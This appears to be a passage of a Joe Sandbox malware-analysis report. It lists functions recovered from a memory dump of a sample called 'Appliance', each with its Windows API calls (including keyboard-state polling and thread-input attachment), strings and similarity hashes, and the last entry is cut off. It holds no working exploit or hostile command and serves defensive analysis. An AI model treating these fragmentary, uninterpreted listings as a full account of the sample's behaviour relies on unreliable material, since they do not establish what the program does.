SHGetDesktopFolder.SHELL32(?), ref: 00E385E8
CoCreateInstance.OLE32(00E60CD4,00000000,00000001,00E87E8C,?), ref: 00E38634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E386B9
CoTaskMemFree.OLE32(?,?), ref: 00E38711
SHBrowseForFolderW.SHELL32(?), ref: 00E3879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E387BF
CoTaskMemFree.OLE32(00000000), ref: 00E387C6
CoTaskMemFree.OLE32(00000000), ref: 00E3881B
CoUninitialize.OLE32 ref: 00E38821

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e11397c956041f803245be984a8aff4ef9c1a477875c888f1611287fbb494d83
Instruction ID: 5e7ae8ac1e0590c836341b040efc0a61cc382c5cc125d35121e02b524bcf039b
Opcode Fuzzy Hash: e11397c956041f803245be984a8aff4ef9c1a477875c888f1611287fbb494d83
Instruction Fuzzy Hash: D7C10975A00205AFCB14DFA4C988DAEBBB9FF48304F148599F519EB261DB31ED45CBA0

Function 00E20378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E2039F
SafeArrayAllocData.OLEAUT32(?), ref: 00E203F8
VariantInit.OLEAUT32(?), ref: 00E2040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E2042A
VariantCopy.OLEAUT32(?,?), ref: 00E2047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E20491
VariantClear.OLEAUT32(?), ref: 00E204A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00E204B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E204BC
VariantClear.OLEAUT32(?), ref: 00E204CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E204D9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 469a754e75d6a2926d733f194a8465f432d366c401759377d8a793a319daa777
Instruction ID: e78a26932472d34bf945e75c43506fc2941f58dceb17174a189e43d708c6e3c9
Opcode Fuzzy Hash: 469a754e75d6a2926d733f194a8465f432d366c401759377d8a793a319daa777
Instruction Fuzzy Hash: EC417071A04229DFCB14EFA5DC449EE7BB9FF08355F008429E965B7262CB30A945CFA0

Function 00E2A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E2A65D
GetAsyncKeyState.USER32(000000A0), ref: 00E2A6DE
GetKeyState.USER32(000000A0), ref: 00E2A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00E2A713
GetKeyState.USER32(000000A1), ref: 00E2A728
GetAsyncKeyState.USER32(00000011), ref: 00E2A740
GetKeyState.USER32(00000011), ref: 00E2A752
GetAsyncKeyState.USER32(00000012), ref: 00E2A76A
GetKeyState.USER32(00000012), ref: 00E2A77C
GetAsyncKeyState.USER32(0000005B), ref: 00E2A794
GetKeyState.USER32(0000005B), ref: 00E2A7A6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3321a55e98e698ee0c53c9c0749e9caebcbf52807a0691712181e2cbb79cfdbb
Instruction ID: 05022a9e7fdcec26ff8afb28fa2fe77da0f630e4aadb1c425b03a8f3153487b4
Opcode Fuzzy Hash: 3321a55e98e698ee0c53c9c0749e9caebcbf52807a0691712181e2cbb79cfdbb
Instruction Fuzzy Hash: F841D6645047DA6FFF319760E8043A5BEB06B1130CF0C947AD5C67A1C2EB9499C8CBA7

Function 00E49730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00E49750

Part of subcall function 00E29805: _wcslen.LIBCMT ref: 00E29828

_wcslen.LIBCMT ref: 00E497AB
_wcslen.LIBCMT ref: 00E497F9
_wcslen.LIBCMT ref: 00E49839
_wcslen.LIBCMT ref: 00E498CB

Strings

winapi, xrefs: 00E497F3, 00E497F8
cdecl, xrefs: 00E497A5, 00E497AA
none, xrefs: 00E498C2, 00E498C7
stdcall, xrefs: 00E49833, 00E49838

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 96768b999c9c5c113b31764f4790e8726d3479b7a00c50959b0e2d14c123ac3c
Instruction ID: 42a2cff51bf0319eabed7908b12c9582b01afe8399c93ba8d60f7212e377205f
Opcode Fuzzy Hash: 96768b999c9c5c113b31764f4790e8726d3479b7a00c50959b0e2d14c123ac3c
Instruction Fuzzy Hash: 7251D531A001169BCF14DF6CD9419BFB3A1FF59368B20522AE966F7286DB31DD41C7A0

Function 00E44189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00E441D1
CoUninitialize.OLE32 ref: 00E441DC
CoCreateInstance.OLE32(?,00000000,00000017,00E60B44,?), ref: 00E44236
IIDFromString.OLE32(?,?), ref: 00E442A9
VariantInit.OLEAUT32(?), ref: 00E44341
VariantClear.OLEAUT32(?), ref: 00E44393

Strings

Invalid parameter, xrefs: 00E442C2
NULL Pointer assignment, xrefs: 00E4427B
Failed to create object, xrefs: 00E44241, 00E442F7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e02133413ab5c84fd7ef08cec4f5dcebce18cd623f9c2ab3f503db0f2aa52940
Instruction ID: 3359bed208971740bc1f7cf6842e882444f4ce8a7755ecda639e585c9978895f
Opcode Fuzzy Hash: e02133413ab5c84fd7ef08cec4f5dcebce18cd623f9c2ab3f503db0f2aa52940
Instruction Fuzzy Hash: F461AFB17083019FD314DF65E849F5ABBE4EF49714F001909F985AB2A1C770ED48CBA6

Function 00E38BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E38C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E38CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E38CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E38D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E38DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38DDA

Strings

*.*, xrefs: 00E38DE0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 68cf9d63d9e6141d36ee3f0bc3a94f14c7d0a63cb0e92791c30db88d309fca29
Instruction ID: 0a6e35ecd3a3a3a69d7490337fecc57e10178a0e39bade0085625365767c6bf4
Opcode Fuzzy Hash: 68cf9d63d9e6141d36ee3f0bc3a94f14c7d0a63cb0e92791c30db88d309fca29
Instruction Fuzzy Hash: 20617AB25043059FCB10EF60C944E9EB7E8FF98314F04592EF989A7251DB31E945CBA2

Function 00DDFBC6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00DDFC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E1FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E1FC98

Strings

(, xrefs: 00E1FBC0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ShowWindow
String ID: (
API String ID: 1268545403-2063206799
Opcode ID: 52c29556e967c24b7a337141cd2cecfcf588769dc8103d1b0ca508a7eeb38c7b
Instruction ID: 1b5e4dc779baf75e12a67963dd822706dbf6a3ba75f58912bdc65b8713a3a333
Opcode Fuzzy Hash: 52c29556e967c24b7a337141cd2cecfcf588769dc8103d1b0ca508a7eeb38c7b
Instruction Fuzzy Hash: FE41293061C3C89EC7388B3DC9C8B697B91AB46315F18452FE98766B60D631E894D771

Function 00E546E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00E54715
SetMenu.USER32(?,00000000), ref: 00E54724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E547AC
IsMenu.USER32(?), ref: 00E547C0
CreatePopupMenu.USER32 ref: 00E547CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E547F7
DrawMenuBar.USER32 ref: 00E547FF

Strings

F, xrefs: 00E547EA
0, xrefs: 00E546F0

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 7b885f25a2735a9fbf645d02931b0197489324817349e1de853abfdc103b8f03
Instruction ID: 69decf70b42cd3d1557b7ea6b1b8a984218b95f3353735fbe0264545afaec517
Opcode Fuzzy Hash: 7b885f25a2735a9fbf645d02931b0197489324817349e1de853abfdc103b8f03
Instruction Fuzzy Hash: 6A4187B5A01309EFDB28CF65D844EAA7BB5FF49319F044829FE05A7390D770AA18CB50

Function 00E2282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00E228B1
GetDlgCtrlID.USER32 ref: 00E228BC
GetParent.USER32 ref: 00E228D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E228DB
GetDlgCtrlID.USER32(?), ref: 00E228E4
GetParent.USER32(?), ref: 00E228F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E228FB

Strings

ListBox, xrefs: 00E2286E
ComboBox, xrefs: 00E22839

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: ffcf22cd13cbf1794f8ff080426c17775eb3a4964f463c163a2f06859d69c61c
Instruction ID: b7b73098f28f7f15e8699652cf91552d85fc6ce819f2f9a5bc775e6ed546e4d5
Opcode Fuzzy Hash: ffcf22cd13cbf1794f8ff080426c17775eb3a4964f463c163a2f06859d69c61c
Instruction Fuzzy Hash: 7921C275D00228BFCF15ABA0DC85EEEBBB4EF09310F00051AF952B72A1DB758959DB60

Function 00E2290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00E22990
GetDlgCtrlID.USER32 ref: 00E2299B
GetParent.USER32 ref: 00E229B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E229BA
GetDlgCtrlID.USER32(?), ref: 00E229C3
GetParent.USER32(?), ref: 00E229D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E229DA

Strings

ListBox, xrefs: 00E2294F
ComboBox, xrefs: 00E2291A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: f8a9dda442a0b2e9d4fb33de66bfda74fd4db6f49d70acba0f69d3330ef14006
Instruction ID: e7fa3c53c52e0130faa848a427844757902280413313968f66e4b1c26b1fbd48
Opcode Fuzzy Hash: f8a9dda442a0b2e9d4fb33de66bfda74fd4db6f49d70acba0f69d3330ef14006
Instruction Fuzzy Hash: 5D219F75D00228BFCF15ABA0DC86EEEBBB8EF09314F00541BB951B7191CB758859DB61

Function 00E544BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E54539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E5453C
GetWindowLongW.USER32(?,000000F0), ref: 00E54563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E54586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E545FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E54648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E54663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E5467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E54692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E546AF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: af2ce73440c933a59ce8811400ac3ddfc078358ae739c566a66b37357c687969
Instruction ID: d6954586c81aecde8db127ea501614f1b4f04c55d31db8a8913a5d6ed1b2e795
Opcode Fuzzy Hash: af2ce73440c933a59ce8811400ac3ddfc078358ae739c566a66b37357c687969
Instruction Fuzzy Hash: 8A616CB5A00208AFDB10DFA4CC81FEE77B8EB49714F10055AFA14B72A1D7B4A989DB50

Function 00E2BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E2BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00E2BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E2ABA8,?,00000001), ref: 00E2BBE4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6d9bfddd129c83a3a89bc0238267db0cf04b68c8c2a36f1757ffdf1f9b628909
Instruction ID: a68eb581edb603ff3fabbe499d744a56d7189fd4a5d8ff0fe0fb293c41987a94
Opcode Fuzzy Hash: 6d9bfddd129c83a3a89bc0238267db0cf04b68c8c2a36f1757ffdf1f9b628909
Instruction Fuzzy Hash: 9131A2B2908314AFDB249B26EC88FA977A9EB4431AF104407FA05F71E4D7B49C49CB21

Function 00DC2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DC2AF9
OleUninitialize.OLE32(?,00000000), ref: 00DC2B98
UnregisterHotKey.USER32(?), ref: 00DC2D7D
DestroyWindow.USER32(?), ref: 00E03A1B
FreeLibrary.KERNEL32(?), ref: 00E03A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E03AAD

Strings

close all, xrefs: 00DC2AF4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: d34cd81537487e1e8cff66903d3ae2eb6cb827ed49d0ba987b2a7d2320bf3149
Instruction ID: 92d01fce7bec2ce6ca306249533d2f03f9037eeca6101047026ad36312623fde
Opcode Fuzzy Hash: d34cd81537487e1e8cff66903d3ae2eb6cb827ed49d0ba987b2a7d2320bf3149
Instruction Fuzzy Hash: 8AD138317012129FCB29EF25C845F69F7A4EF04714F1156ADE84ABB2A1CB30AD92CF60

Function 00E38835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E389F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38A06
GetFileAttributesW.KERNEL32(?), ref: 00E38A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00E38A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00E38AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E38AF5

Strings

*.*, xrefs: 00E38AAB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 951e577ed9f008fe1e3163d87ecd0f82e79f0c00fd62ba0d7ab14b0664a470e8
Instruction ID: 2303085c79bdb77ad01a535ddbb552beabac23ab042634f8373b7bbae185d2e1
Opcode Fuzzy Hash: 951e577ed9f008fe1e3163d87ecd0f82e79f0c00fd62ba0d7ab14b0664a470e8
Instruction Fuzzy Hash: 1181BF729043459BCB24EF14C948ABABBE8FF94314F54581EF889E7250DF34D945CBA2

Function 00E588F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E58992
IsWindowEnabled.USER32(00000000), ref: 00E5899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E58A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00E58AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00E58AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00E58B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E58B1E

Strings

(, xrefs: 00E589D5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (
API String ID: 4072528602-2063206799
Opcode ID: e7f4f3b01985e812e72174f9b06afb0dae6f309a6db1fcf15080539a962ab717
Instruction ID: a8115e0757dfcb4d27b0614cc3fba958c6b8f41d03341080afeab847a2ebdc95
